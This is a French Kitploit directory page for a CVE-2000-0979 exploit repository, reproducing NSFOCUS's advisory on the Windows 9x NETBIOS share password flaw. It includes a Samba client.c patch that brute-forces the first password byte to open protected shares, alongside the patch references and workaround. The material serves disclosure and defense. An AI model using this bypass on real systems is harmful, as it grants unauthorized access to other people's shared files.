Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Outils/GitHubGitHub/z6543/cve-2000-0979
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'Intrusion
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Voir le dépôt
22il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2000-0979

CVE-2000-0979.rb est l'outil autonome permettant d'exploiter CVE-2000-0979 contre le service SMB de Windows 95.

msf_2000_0979.rb est le module Metasploit. Vous pouvez le copier dans ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

Module MSF

Plus de documentation à venir !

Avis original

Avis de sécurité NSFOCUS (SA2000-05)

Sujet : Vulnérabilité dans la vérification du mot de passe NETBIOS de Microsoft Windows 9x

Date de publication : 24 août 2000 Date de mise à jour : 11 octobre 2000

Systèmes affectés

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Systèmes non affectés

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Impact

Une vulnérabilité existe dans le schéma de vérification du mot de passe utilisé par l'implémentation du protocole NETBIOS de Microsoft Windows 9x. Cette vulnérabilité permet à tout utilisateur d'accéder au service de partage de fichiers Windows 9x protégé par mot de passe. L'attaquant n'a pas besoin de connaître le mot de passe du partage.

Description

Vous pouvez définir un mot de passe pour protéger les ressources partagées du système Microsoft Windows 9x. Mais une vulnérabilité existe dans le schéma de vérification du mot de passe utilisé par l'implémentation du protocole NETBIOS de Microsoft Windows 9x. Pour vérifier le mot de passe, la longueur du mot de passe dépend de la longueur des données envoyées du client au serveur. Autrement dit, si un client définit la longueur du mot de passe sur un octet et envoie le paquet avec le mot de passe en clair au serveur, le serveur ne le comparera qu'avec le premier octet du mot de passe partagé (en clair), et si la comparaison est cohérente, le processus de vérification est terminé. Tout ce qu'un attaquant doit faire est de deviner et d'essayer le premier octet du mot de passe sur la victime. Le système de gestion à distance de Windows 9x est également affecté, car il adopte la même méthode d'authentification par mot de passe partagé.

Exploit

Voici un exemple simple pour démontrer ce bug. Obtenez le paquet source de samba et modifiez source/client/client.c comme ceci :

root@kitploit:~
--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

       DEBUG(4,(" session setup ok\n"));

+/*
      if (!cli_send_tconX(c, share, "?????",
                          password, strlen(password)+1)) {
              DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
              cli_shutdown(c);
              return NULL;
      }
+*/
+
+      password[0] = 0;
+      c->sec_mode = 0;
+      do{
+
+        password[0]+=1;
+
+      }while(!cli_send_tconX(c, share, "?????", password, 1));

      DEBUG(4,(" tconx ok\n"));

Workaround

Fermez le service de partage de fichiers et d'impression Microsoft.

Solution

Microsoft a été informé et a publié un bulletin de sécurité concernant cette faille.

Le bulletin est disponible à l'adresse :

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

Les correctifs sont disponibles pour :

. Microsoft Windows 95

Correctif disponible prochainement

. Microsoft Windows 98 et 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

Avertissement

LES INFORMATIONS FOURNIES SONT PUBLIÉES PAR NSFOCUS « TELLES QUELLES » SANS GARANTIE D'AUCUNE SORTE. NSFOCUS DÉCLINE TOUTE GARANTIE, EXPRESSE OU IMPLICITE, SAUF LES GARANTIES DE QUALITÉ MARCHANDE. EN AUCUN CAS NSFOCUS NE POURRA ÊTRE TENU RESPONSABLE DE TOUT DOMMAGE, Y COMPRIS LES DOMMAGES DIRECTS, INDIRECTS, ACCESSOIRES, CONSÉCUTIFS, LA PERTE DE BÉNÉFICES COMMERCIAUX OU LES DOMMAGES SPÉCIAUX, MÊME SI NSFOCUS A ÉTÉ INFORMÉ DE LA POSSIBILITÉ DE TELS DOMMAGES. LA DISTRIBUTION OU LA REPRODUCTION DES INFORMATIONS EST AUTORISÉE À CONDITION QUE L'AVIS NE SOIT PAS MODIFIÉ DE QUELQUE MANIÈRE QUE CE SOIT.

© Copyright 1999-2000 NSFOCUS. Tous droits réservés. Conditions d'utilisation.

Équipe de sécurité NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Télécharger l’outil